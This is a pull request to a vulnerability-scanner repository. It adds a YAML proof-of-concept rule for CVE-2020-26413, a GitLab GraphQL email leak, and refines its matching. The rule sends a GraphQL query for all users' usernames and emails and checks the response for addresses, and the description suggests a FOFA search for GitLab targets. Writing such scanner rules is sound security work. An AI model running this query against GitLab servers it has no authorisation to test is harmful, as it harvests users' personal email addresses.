### PR TITLE
gitlab-graphql-info-leak-cve-2020-26413

### DIFF
--- a/pocs/gitlab-graphql-info-leak-cve-2020-26413.yml
+++ b/pocs/gitlab-graphql-info-leak-cve-2020-26413.yml
@@ -7,7 +7,7 @@ rules:
     body: |-
       {"query":"{\nusers {\nedges {\n  node {\n    username\n    email\n    avatarUrl\n    status {\n      emoji\n      message\n      messageHtml\n     }\n    }\n   }\n  }\n }","variables":null,"operationName":null}
     expression: |-
-      response.status == 200 && "x-runtime" in response.headers && response.body.bcontains(b"{\"data\":{\"users\":{\"edges\":[{\"node\":{\"username\":\"") && response.body.bcontains(b"\",\"avatarUrl\":\"")
+      response.status == 200 && "x-runtime" in response.headers && response.body.bcontains(b"{\"data\":{\"users\":{\"edges\":[{\"node\":{\"username\":\"") && r'","email":"[^"]+@[^"]+"'.bmatches(response.body)
 detail:
   author: Print1n(https://github.com/Print1n)
   description: GitLab Graphql邮箱信息泄露漏洞 CNVD-2021-14193 / CVE-2020-26413

--- a/pocs/gitlab-graphql-info-leak-cve-2020-26413.yml
+++ b/pocs/gitlab-graphql-info-leak-cve-2020-26413.yml
@@ -7,7 +7,7 @@ rules:
     body: |-
       {"query":"{\nusers {\nedges {\n  node {\n    username\n    email\n    avatarUrl\n    status {\n      emoji\n      message\n      messageHtml\n     }\n    }\n   }\n  }\n }","variables":null,"operationName":null}
     expression: |-
-      response.status == 200 && "x-runtime" in response.headers && response.body.bcontains(b"{\"data\":{\"users\":{\"edges\":[{\"node\":{\"username\":\"") && r'","email":"[^"]+@[^"]+"'.bmatches(response.body)
+      response.status == 200 && "x-runtime" in response.headers && response.body.bcontains(b"{\"data\":{\"users\":{\"edges\":[{\"node\":{\"username\":\"") && "\",\"email\":\"[^\"]+@[^\"]+\"".bmatches(response.body)
 detail:
   author: Print1n(https://github.com/Print1n)
   description: GitLab Graphql邮箱信息泄露漏洞 CNVD-2021-14193 / CVE-2020-26413

--- a/pocs/gitlab-graphql-info-leak-cve-2020-26413.yml
+++ b/pocs/gitlab-graphql-info-leak-cve-2020-26413.yml
@@ -1,0 +1,15 @@
+name: poc-yaml-gitlab-graphql-info-leak-cve-2020-26413
+rules:
+  - method: POST
+    path: /api/graphql
+    headers:
+      Content-Type: application/json
+    body: |-
+      {"query":"{\nusers {\nedges {\n  node {\n    username\n    email\n    avatarUrl\n    status {\n      emoji\n      message\n      messageHtml\n     }\n    }\n   }\n  }\n }","variables":null,"operationName":null}
+    expression: |-
+      response.status == 200 && "x-runtime" in response.headers && response.body.bcontains(b"{\"data\":{\"users\":{\"edges\":[{\"node\":{\"username\":\"") && response.body.bcontains(b"\",\"avatarUrl\":\"")
+detail:
+  author: Print1n(https://github.com/Print1n)
+  description: GitLab Graphql邮箱信息泄露漏洞 CNVD-2021-14193 / CVE-2020-26413
+  links:
+    - https://fengchenzxc.github.io/%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/GitLab/GitLab%20Graphql%E9%82%AE%E7%AE%B1%E4%BF%A1%E6%81%AF%E6%B3%84%E9%9C%B2%E6%BC%8F%E6%B4%9E%20CVE-2020-26413/


### PR DESCRIPTION
## 本 poc 是检测什么漏洞的
GitLab Graphql邮箱信息泄露漏洞 CNVD-2021-14193 / CVE-2020-26413
## 测试环境
fofa app="GitLab"
## 备注
与#1164 是同一个漏洞，对该漏洞的误报进行了改进
![image](https://user-images.githubusercontent.com/73928418/126054822-1850d446-d9be-4f1a-bb2d-d6d1d5e5da72.png)

